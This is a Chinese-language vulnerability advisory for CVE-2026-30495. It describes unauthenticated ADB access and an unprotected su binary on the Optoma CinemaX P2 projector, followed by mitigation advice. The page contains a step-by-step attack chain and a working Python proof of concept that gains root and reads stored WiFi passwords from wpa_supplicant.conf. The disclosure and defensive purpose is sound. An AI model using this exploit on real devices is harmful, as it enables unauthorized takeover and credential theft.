IPBUF安全漏洞报告
English
CVE-2026-30495 CVSS 8.8 高危

CVE-2026-30495 Optoma投影仪未授权ADB访问漏洞

披露日期: 2026-05-07
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-30495
漏洞类型
未授权访问, 权限提升
CVSS评分
8.8 高危
攻击向量
邻接 (AV:A)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Optoma CinemaX P2

相关标签

未授权访问权限提升IoTADB硬件漏洞Optoma

漏洞概述

Optoma CinemaX P2 投影仪(固件版本 TVOS-04.24.010.04.01,基于 Android 8.0.0)存在严重的安全配置缺陷。该设备在网络接口上默认开启了 Android 调试桥(ADB)服务(TCP 5555 端口),且未实施任何身份验证机制。由于系统属性 `ro.adb.secure` 被设置为 0,RSA 密钥验证功能被禁用。此外,系统中存在未受保护的 `/system/xbin/su` 二进制文件。处于同一局域网的攻击者可利用该漏洞无需密码连接 ADB,提权至 root,从而完全控制设备,窃取 WiFi 凭证、安装恶意软件并访问所有敏感数据。

技术细节

该漏洞的核心原因在于设备固件对 Android 调试接口的不当配置。首先,设备将 ADB 服务暴露在 TCP 5555 端口,且 `ro.adb.secure=0` 的配置导致客户端在连接时无需进行 RSA 密钥握手,绕过了标准的 Android 安全机制。其次,设备文件系统中包含 `/system/xbin/su` 程序,且该程序未集成任何授权检查(如 Android 的 Superuser 权限管理应用),允许任意用户直接调用获取 root 权限。攻击过程极为简单:攻击者使用 `adb connect` 命令连接目标 IP 即可获得一个受限的 Shell,随后直接执行 `su` 命令即可切换至 root 用户。一旦获得 root 权限,攻击者可以读取系统分区数据、提取包含明文密码的 WiFi 配置文件(如 `wpa_supplicant.conf`),甚至修改系统启动项以植入持久化后门。

攻击链分析

STEP 1
1. 端口扫描与发现
攻击者在目标局域网内扫描 TCP 5555 端口,发现 Optoma CinemaX P2 投影仪暴露的 ADB 服务。
STEP 2
2. 建立 ADB 连接
由于 `ro.adb.secure=0`,攻击者使用 `adb connect` 命令成功连接到设备,无需进行 RSA 密钥验证。
STEP 3
3. 获取 Shell 权限
攻击者执行 `adb shell` 进入设备的命令行环境,获得低权限的 Shell 访问。
STEP 4
4. 提权至 Root
攻击者在 Shell 中执行 `/system/xbin/su`。由于未配置认证,系统直接返回 root 权限的 Shell。
STEP 5
5. 数据窃取与控制
攻击者读取 `/data/misc/wifi/wpa_supplicant.conf` 获取 WiFi 密码,或安装恶意软件实现持久化控制。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/usr/bin/env python3 import subprocess import sys # PoC for CVE-2026-30495: Optoma CinemaX P2 Unauthorized ADB Root # The device exposes ADB on port 5555 without auth and has an unsecured su binary. # Usage: python3 poc.py <TARGET_IP> target = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.100" port = "5555" print(f"[*] Target: {target}:{port}") try: # Step 1: Connect to the ADB server on the device print("[*] Connecting to ADB daemon...") subprocess.run(["adb", "connect", f"{target}:{port}"], check=True) # Step 2: Verify standard shell access print("[*] Checking standard shell access...") result = subprocess.run(["adb", "shell", "whoami"], capture_output=True, text=True) print(f" Current user: {result.stdout.strip()}") # Step 3: Escalate privileges using the unsecured su binary print("[*] Escalating to root privileges...") # Reading WiFi credentials as proof of root access cmd = "cat /data/misc/wifi/wpa_supplicant.conf" print(f"[*] Running: {cmd}") subprocess.run(["adb", "shell", "su", "-c", cmd]) except FileNotFoundError: print("[!] Error: 'adb' command not found. Please ensure Android SDK platform-tools are installed.") except Exception as e: print(f"[!] An error occurred: {e}")

影响范围

Optoma CinemaX P2 (Firmware TVOS-04.24.010.04.01)

防御指南

临时缓解措施
建议立即将受影响设备接入隔离的访客网络或 VLAN,阻断外部非授权访问。检查设备设置,尝试关闭 ADB 调试功能。由于涉及固件层面的安全配置缺陷,应密切关注 Optoma 官方发布的安全补丁并及时升级。对于已遭受攻击的设备,建议重置出厂设置并重新配置 WiFi 密码。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表